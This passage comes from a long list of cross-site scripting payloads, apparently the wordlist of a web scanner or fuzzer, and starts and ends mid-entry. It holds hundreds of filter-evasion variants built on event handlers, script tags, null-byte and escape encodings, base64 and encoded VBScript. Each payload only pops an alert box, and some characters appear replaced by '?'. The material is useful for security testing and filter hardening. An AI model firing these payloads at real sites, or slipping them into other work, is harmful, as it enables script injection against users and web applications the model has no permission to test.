onerror=alert(1) src=a>", '<i[%00]mg onerror=alert(1) src=a>', '"><i[%00]mg onerror=alert(1) src=a>', "'><i[%00]mg onerror=alert(1) src=a>", '<img/onerror=alert(1) src=a>', '"><img/onerror=alert(1) src=a>', "'><img/onerror=alert(1) src=a>", '<img[%09]onerror=alert(1) src=a>', '"><img[%09]onerror=alert(1) src=a>', "'><img[%09]onerror=alert(1) src=a>", '<img[%0d]onerror=alert(1) src=a>', '"><img[%0d]onerror=alert(1) src=a>', "'><img[%0d]onerror=alert(1) src=a>", '<img[%0a]onerror=alert(1) src=a>', '"><img[%0a]onerror=alert(1) src=a>', "'><img[%0a]onerror=alert(1) src=a>", '<img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '<img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '<img/anyjunk/onerror=alert(1) src=a>', '"><img/anyjunk/onerror=alert(1) src=a>', "'><img/anyjunk/onerror=alert(1) src=a>", '<img o[%00]nerror=alert(1) src=a>', '"><img o[%00]nerror=alert(1) src=a>', "'><img o[%00]nerror=alert(1) src=a>", '<i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>', '"><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>', "'><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>", '<img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', "'><img 
onerror=?alert(1)?src=a>", '<img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '<img onerror=`alert(1)`src=a>', '"><img onerror=`alert(1)`src=a>', "'><img onerror=`alert(1)`src=a>", '<iframe src=javascript:alert(1) >', '"><iframe src=javascript:alert(1) >', "'><iframe src=javascript:alert(1) >", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '%253cimg%20onerror=alert(1)%20src=a%253e', '%3cimg onerror=alert(1) src=a%3e', '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '?img onerror=alert(1) src=a?', '<script>a\\u006cert(1);</script>', '</ScrIpt><script>a\\u006cert(1);</script>', '"><script>a\\u006cert(1);</script>', '</ScrIpt><script>a\\u006cert(1);</script>', "'><script>a\\u006cert(1);</script>", '</ScrIpt><script>a\\u006cert(1);</script>', '<script>eval(?a\\u006cert(1)?);</script>', '</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', '"><script>eval(?a\\u006cert(1)?);</script>', '</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', "'><script>eval(?a\\u006cert(1)?);</script>", 
'</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', '<script>eval(?a\\x6cert(1)?);</script>', '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', '"><script>eval(?a\\x6cert(1)?);</script>', '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', "'><script>eval(?a\\x6cert(1)?);</script>", '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', '<script>eval(?a\\154ert(1)?);</script>', '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', '"><script>eval(?a\\154ert(1)?);</script>', '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', "'><script>eval(?a\\154ert(1)?);</script>", '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', '<script>eval(?a\\l\\ert\\(1\\)?);</script>', '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', '"><script>eval(?a\\l\\ert\\(1\\)?);</script>', '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', "'><script>eval(?a\\l\\ert\\(1\\)?);</script>", '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', '<script>eval(?al?+?ert(1)?);</script>', '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', '"><script>eval(?al?+?ert(1)?);</script>', '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', "'><script>eval(?al?+?ert(1)?);</script>", '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', '<script>eval(String.fromCharCode(75,67,70));</script>', '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', '"><script>eval(String.fromCharCode(75,67,70));</script>', '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', "'><script>eval(String.fromCharCode(75,67,70));</script>", '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', '<script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '"><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', "'><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>", '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', 
'<script>?alert(1)?.replace(/.+/,eval)</script>', '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', '"><script>?alert(1)?.replace(/.+/,eval)</script>', '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', "'><script>?alert(1)?.replace(/.+/,eval)</script>", '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', '<script>function::[?alert?](1)</script>', '</ScrIpt><script>function::[?alert?](1)</script>', '"><script>function::[?alert?](1)</script>', '</ScrIpt><script>function::[?alert?](1)</script>', "'><script>function::[?alert?](1)</script>", '</ScrIpt><script>function::[?alert?](1)</script>', '<img onerror=eval('al\u0065rt(1)') src=a>', '"><img onerror=eval('al\u0065rt(1)') src=a>', "'><img onerror=eval('al\u0065rt(1)') src=a>", '<script language=vbs>MsgBox 1</script>', '"><script language=vbs>MsgBox 1</script>', "'><script language=vbs>MsgBox 1</script>", '<img onerror=?vbs:MsgBox 1? src=a>', '"><img onerror=?vbs:MsgBox 1? src=a>', "'><img onerror=?vbs:MsgBox 1? src=a>", '<img onerror=MsgBox+1 language=vbs src=a>', '"><img onerror=MsgBox+1 language=vbs src=a>', "'><img onerror=MsgBox+1 language=vbs src=a>", '<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>', '"><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>', "'><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>", '<IMG ONERROR=?VBS:MSGBOX 1? SRC=A>', '"><IMG ONERROR=?VBS:MSGBOX 1? SRC=A>', "'><IMG ONERROR=?VBS:MSGBOX 1? 
SRC=A>", '<script>execScript(?MsgBox 1?,?vbscript?);</script>', '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', '"><script>execScript(?MsgBox 1?,?vbscript?);</script>', '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', "'><script>execScript(?MsgBox 1?,?vbscript?);</script>", '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', '<script language=vbs>execScript(?alert(1)?)</script>', '"><script language=vbs>execScript(?alert(1)?)</script>', "'><script language=vbs>execScript(?alert(1)?)</script>", '<SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>', '"><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>', "'><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>", '<IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>', '"><IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>', "'><IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>", '<img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>', '"><img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>', "'><img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>", '<img language=?JScript.Encode? onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? src=a>', '"><img language=?JScript.Encode? onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? src=a>', "'><img language=?JScript.Encode? onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? 
src=a>", '<script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', '"><script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', "'><script>var a = ?</script><script>alert(1)</script>", '</ScrIpt><script>var a = ?</script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<scr%00ipt%20&message=> alert(?X?)</script>', '"><scr%00ipt%20&message=> alert(?X?)</script>', "'><scr%00ipt%20&message=> alert(?X?)</script>", '?<script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?;alert(1)//', '?-alert(1)-?', '?<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '?;prompt(1)//', '?-prompt(1)-?', '<input type="text" AUTOFOCUS onfocus=alert(1)>', '"><input type="text" AUTOFOCUS onfocus=alert(1)>', '\'><input type="text" AUTOFOCUS onfocus=alert(1)>', '<script\\x20type="text/javascript">javascript:alert(1);</script>', '"><script\\x20type="text/javascript">javascript:alert(1);</script>', '\'><script\\x20type="text/javascript">javascript:alert(1);</script>', '<script\\x3Etype="text/javascript">javascript:alert(1);</script>', '"><script\\x3Etype="text/javascript">javascript:alert(1);</script>', '\'><script\\x3Etype="text/javascript">javascript:alert(1);</script>', '<script\\x0Dtype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Dtype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Dtype="text/javascript">javascript:alert(1);</script>', 
'<script\\x09type="text/javascript">javascript:alert(1);</script>', '"><script\\x09type="text/javascript">javascript:alert(1);</script>', '\'><script\\x09type="text/javascript">javascript:alert(1);</script>', '<script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Ctype="text/javascript">javascript:alert(1);</script>', '<script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '"><script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '\'><script\\x2Ftype="text/javascript">javascript:alert(1);</script>', '<script\\x0Atype="text/javascript">javascript:alert(1);</script>', '"><script\\x0Atype="text/javascript">javascript:alert(1);</script>', '\'><script\\x0Atype="text/javascript">javascript:alert(1);</script>', '\'`"><\\x00script>javascript:alert(1)</script>', '<img src=1 href=1 onerror="javascript:alert(1)"></img>', '"><img src=1 href=1 onerror="javascript:alert(1)"></img>', '\'><img src=1 href=1 onerror="javascript:alert(1)"></img>', '<audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '"><audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '\'><audio src=1 href=1 onerror="javascript:alert(1)"></audio>', '<video src=1 href=1 onerror="javascript:alert(1)"></video>', '"><video src=1 href=1 onerror="javascript:alert(1)"></video>', '\'><video src=1 href=1 onerror="javascript:alert(1)"></video>', '<body src=1 href=1 onerror="javascript:alert(1)"></body>', '"><body src=1 href=1 onerror="javascript:alert(1)"></body>', '\'><body src=1 href=1 onerror="javascript:alert(1)"></body>', '<image src=1 href=1 onerror="javascript:alert(1)"></image>', '"><image src=1 href=1 onerror="javascript:alert(1)"></image>', '\'><image src=1 href=1 onerror="javascript:alert(1)"></image>', '<object src=1 href=1 onerror="javascript:alert(1)"></object>', '"><object src=1 href=1 onerror="javascript:alert(1)"></object>', '\'><object src=1 href=1 
onerror="javascript:alert(1)"></object>', '<script src=1 href=1 onerror="javascript:alert(1)"></script>', '"><script src=1 href=1 onerror="javascript:alert(1)"></script>', '\'><script src=1 href=1 onerror="javascript:alert(1)"></script>', '<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '"><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '\'><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>', '<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '"><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '\'><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>', '<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '"><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '\'><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>', '<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '"><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '\'><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>', '<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '"><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '\'><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>', '<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '"><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '\'><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>', '<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', 
'"><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', '\'><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>', '<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '"><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '\'><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>', '<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '"><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '\'><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>', '<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '"><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '\'><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>', '<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '"><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '\'><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>', '<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '"><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '\'><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>', '<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '"><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '\'><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>', '<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', '"><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', 
'\'><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>', '<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '"><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '\'><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>', '<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '"><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '\'><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>', '<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '"><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '\'><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>', '<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '"><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '\'><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>', '<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '"><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '\'><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>', '<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '"><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '\'><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>', '<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '"><style 
onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '\'><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>', '<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '"><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '\'><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>', '<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '"><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '\'><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>', '<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '"><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '\'><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>', '<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '"><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '\'><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>', '<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '"><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '\'><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>', '<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '"><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '\'><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>', '<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '"><body onBeforeUnload body 
onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '\'><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>', '<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '"><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '\'><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>', '<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '"><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '\'><marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>', '<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '"><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '\'><xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>', '<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '"><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '\'><frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>', '<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '"><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '\'><applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>', '<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '"><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '\'><svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>', '<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html 
onMouseOut>', '"><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>', '\'><html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>', '<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '"><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '\'><body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>', '<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '"><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '\'><body onResize body onResize="javascript:javascript:alert(1)"></body onResize>', '<object onError object onError="javascript:javascript:alert(1)"></object onError>', '"><object onError object onError="javascript:javascript:alert(1)"></object onError>', '\'><object onError object onError="javascript:javascript:alert(1)"></object onError>', '<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '"><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '\'><body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>', '<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '"><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '\'><html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>', '<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '"><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '\'><applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>', '<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '"><body onpagehide 
body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '\'><body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>', '<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '"><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '\'><svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>', '<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '"><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '\'><applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>', '<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '"><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '\'><body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>', '<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '"><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '\'><body onunload body onunload="javascript:javascript:alert(1)"></body onunload>', '<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '"><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '\'><iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>', '<body onload body onload="javascript:javascript:alert(1)"></body onload>', '"><body onload body onload="javascript:javascript:alert(1)"></body onload>', '\'><body onload body onload="javascript:javascript:alert(1)"></body onload>', '<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '"><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '\'><html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>', '<object onbeforeload object 
onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '"><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '\'><object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>', '<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '"><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '\'><body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>', '<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '"><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '\'><body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>', '<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '"><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '\'><body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>', '<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '"><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '\'><iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>', '<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '"><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '\'><iframe src iframe src="javascript:javascript:alert(1)"></iframe src>', '<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '"><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '\'><svg onload svg onload="javascript:javascript:alert(1)"></svg onload>', '<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '"><html onmousemove html 
onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '\'><html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>', '<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '"><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '\'><body onblur body onblur="javascript:javascript:alert(1)"></body onblur>', '\\x3Cscript>javascript:alert(1)</script>', '\'"`><script>/* *\\x2Fjavascript:alert(1)// */</script>', '<script>javascript:alert(1)</script\\x0D', '</ScrIpt><script>javascript:alert(1)</script\\x0D', '"><script>javascript:alert(1)</script\\x0D', '</ScrIpt><script>javascript:alert(1)</script\\x0D', "'><script>javascript:alert(1)</script\\x0D", '</ScrIpt><script>javascript:alert(1)</script\\x0D', '<script>javascript:alert(1)</script\\x0A', '</ScrIpt><script>javascript:alert(1)</script\\x0A', '"><script>javascript:alert(1)</script\\x0A', '</ScrIpt><script>javascript:alert(1)</script\\x0A', "'><script>javascript:alert(1)</script\\x0A", '</ScrIpt><script>javascript:alert(1)</script\\x0A', '<script>javascript:alert(1)</script\\x0B', '</ScrIpt><script>javascript:alert(1)</script\\x0B', '"><script>javascript:alert(1)</script\\x0B', '</ScrIpt><script>javascript:alert(1)</script\\x0B', "'><script>javascript:alert(1)</script\\x0B", '</ScrIpt><script>javascript:alert(1)</script\\x0B', '<script charset="\\x22>javascript:alert(1)</script>', '"><script charset="\\x22>javascript:alert(1)</script>', '\'><script charset="\\x22>javascript:alert(1)</script>', '<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->', '"><!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->', "'><!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->", '--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->', '--><!-- --\\x00> <img src=xxx:x 